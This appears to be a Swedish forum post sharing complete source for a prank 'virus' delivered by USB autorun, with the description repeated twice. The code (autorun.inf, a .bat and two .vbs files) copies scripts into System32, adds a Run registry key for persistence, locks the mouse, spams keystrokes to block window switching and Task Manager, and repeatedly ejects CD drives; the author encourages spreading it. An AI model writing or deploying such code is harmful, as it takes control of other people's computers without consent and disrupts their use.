Jag fick tråkigt innan idag så jag bestämde mig för att göra ett "virus" i .bat & .vbs format.
Det fungerar på följande sätt:
.bat filen startas varje gång du sätter in USB-minnet i en dator via en Autorun som kommer finnas på ditt USB-minne.
.bat filen extraherar därefter 2 st .vbs filer till din system32 mapp och gör så att du inte kan röra din mus så att inte denna process avbryts,
den första .vbs filen kommer göra så att en nyckel i registret läggs till så att denna fil kommer startas varje gång man startar datorn i normalt läge och även starta den andra .vbs filen samtidigt, Den kommer även göra så att lamporna på ditt tangentbor blinkar och musen kommer flyttas till höger nedre hörn, enter knappen, backspace knappen och ESC trycks samtidigt ner vilket gör att det är omöjligt att byta fönster eller starta aktivitetshanteraren.
den andra .vbs filen gör så att din cd-spelare öppnas och stängs hela tiden.
Man kan lägga till så att den raderar viktiga system filer som krävs vid uppstart, men det är för destruktivit och jag kommer inte lägga upp sådana filer, men jag kommer lägga upp till er koderna till självaste "viruset".
Jag tar inget ansvar på saker som kan förstöras eller liknande, Ni får sprida/kopiera det hur ni vill, men gör det helst inte till personer som är väldigt seriösa och har lätt för att bli arga, Ni vill väll inte få ett "formaterings" virus i ansiktet?
datacab.bat
datacab.vbs
datacab2.vbs
autorun.inf
Ni kan ladda ner en snygg icon här: http://www.iconarchive.com/download/icon/zyotism/2001-space-odyssey/HAL-9000.ico
Lägg den i samma mapp som dom andra filerna och se till så ingen heter t.ex. datacab.vbs.txt elr ngt liknande, dom ska heta datacab.vbs endast.
Tänk på att filerna MÅSTE ligga i root på ditt usb! (med andra ord direkt i USBn, inte i någon undermapp), Låt det roliga börja
För att stänga av eller ta bort, starta i felsäkert läge och radera:
C:\Windows\System32\datacab.vbs
C:\Windows\System32\datacab2.vbs
och sen gå till Start > Kör > Regedit > HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run > Radera "Datacab".
Voilá!
Det fungerar på följande sätt:
.bat filen startas varje gång du sätter in USB-minnet i en dator via en Autorun som kommer finnas på ditt USB-minne.
.bat filen extraherar därefter 2 st .vbs filer till din system32 mapp och gör så att du inte kan röra din mus så att inte denna process avbryts,
den första .vbs filen kommer göra så att en nyckel i registret läggs till så att denna fil kommer startas varje gång man startar datorn i normalt läge och även starta den andra .vbs filen samtidigt, Den kommer även göra så att lamporna på ditt tangentbor blinkar och musen kommer flyttas till höger nedre hörn, enter knappen, backspace knappen och ESC trycks samtidigt ner vilket gör att det är omöjligt att byta fönster eller starta aktivitetshanteraren.
den andra .vbs filen gör så att din cd-spelare öppnas och stängs hela tiden.
Man kan lägga till så att den raderar viktiga system filer som krävs vid uppstart, men det är för destruktivit och jag kommer inte lägga upp sådana filer, men jag kommer lägga upp till er koderna till självaste "viruset".
Jag tar inget ansvar på saker som kan förstöras eller liknande, Ni får sprida/kopiera det hur ni vill, men gör det helst inte till personer som är väldigt seriösa och har lätt för att bli arga, Ni vill väll inte få ett "formaterings" virus i ansiktet?
datacab.bat
Kod:
@ECHO OFF COPY datacab.vbs C:\Windows\System32 COPY datacab2.vbs C:\Windows\System32 START C:\Windows\System32\datacab.vbs :MOUSE RUNDLL32 user32.dll,SetCursorPos GOTO MOUSE
datacab.vbs
Kod:
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Datacab" , "C:\Windows\System32\datacab.vbs" , "REG_SZ"
WshShell.Run "C:\Windows\System32\datacab2.vbs"
do
wscript.sleep 100
WshShell.SendKeys "{BS}"
WshShell.SendKeys "~"
WshShell.SendKeys "{CAPSLOCK}"
WshShell.SendKeys "{SCROLLLOCK}"
WshShell.SendKeys "{NUMLOCK}"
WshShell.SendKeys "{ESC}"
loop
datacab2.vbs
Kod:
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
loop
autorun.inf
Kod:
[autorun] open=datacab.bat action=USB Of Disaster icon=HAL-9000.ico label=USB Of Disaster
Ni kan ladda ner en snygg icon här: http://www.iconarchive.com/download/icon/zyotism/2001-space-odyssey/HAL-9000.ico
Lägg den i samma mapp som dom andra filerna och se till så ingen heter t.ex. datacab.vbs.txt elr ngt liknande, dom ska heta datacab.vbs endast.
Tänk på att filerna MÅSTE ligga i root på ditt usb! (med andra ord direkt i USBn, inte i någon undermapp), Låt det roliga börja
För att stänga av eller ta bort, starta i felsäkert läge och radera:
C:\Windows\System32\datacab.vbs
C:\Windows\System32\datacab2.vbs
och sen gå till Start > Kör > Regedit > HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run > Radera "Datacab".
Voilá!
(jag kanske är lat, men jag tror inte jag är ensam om att störa mig på UAC)
